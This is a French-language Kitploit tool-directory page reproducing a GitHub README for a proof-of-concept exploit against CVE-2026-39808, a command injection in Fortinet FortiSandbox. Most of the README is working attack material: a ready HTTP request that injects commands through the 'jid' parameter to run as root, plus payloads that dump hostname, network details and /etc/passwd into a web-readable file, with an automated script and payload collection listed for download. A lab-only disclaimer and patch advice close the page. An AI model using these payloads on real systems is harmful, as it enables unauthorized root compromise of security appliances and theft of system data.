Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-39808
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Voir le dépôt
22il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Évasion de la sandbox root de FortiSandbox - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Aperçu

Ce dépôt contient une preuve de concept (PoC) propre et bien documentée pour CVE-2026-39808 — une vulnérabilité critique d'injection de commandes non authentifiée dans Fortinet FortiSandbox qui permet l'évasion de la sandbox et l'exécution de code à distance en tant que root (uid=0).

Ce que démontre ce PoC :

  • Traversée de chemin + injection de commandes via le paramètre jid
  • Évasion de la sandbox depuis l'environnement d'analyse
  • Exécution de commandes arbitraires avec les privilèges root
  • Lecture des fichiers système et des informations réseau

📸 Démonstration

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

Exploitation réussie affichant uid=0 gid=0 groups=0


🚀 Versions concernées

Plage de versionsStatut
FortiSandbox 4.4.0 – 4.4.8Vulnérable
FortiSandbox 5.0.0 – 5.0.5Vulnérable
4.4.9+ / 5.0.6+Corrigé

🛠️ Utilisation (laboratoire uniquement)

1. Payload simple (recommandé)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Afficher le résultat

Ouvrir dans le navigateur :

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Exemples de payloads avancés

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Contenu du dépôt

  • poc.py → Exploit Python automatisé
  • burp-request.txt → Requête Burp Suite prête à l'emploi
  • payloads.md → Collection de payloads utiles
  • screenshots/ → Images de l'exploitation étape par étape
  • README.md → Ce fichier

⚠️ Notes importantes

  • Uniquement à des fins éducatives et de laboratoire
  • N'utilisez PAS ce PoC sur des systèmes de production ou non autorisés
  • Obtenez toujours une autorisation appropriée avant de tester
  • Corrigez votre FortiSandbox vers les versions 4.4.9+ ou 5.0.6+

🛡️ Atténuation

Mettez à jour FortiSandbox immédiatement vers l'une des versions suivantes :

  • 4.4.9 ou supérieure
  • 5.0.6 ou supérieure

Fortinet a publié des correctifs officiels pour cette vulnérabilité.


Conçu à des fins de recherche et d'apprentissage
⭐ Mettez une étoile à ce dépôt s'il vous a aidé !

Télécharger l’outil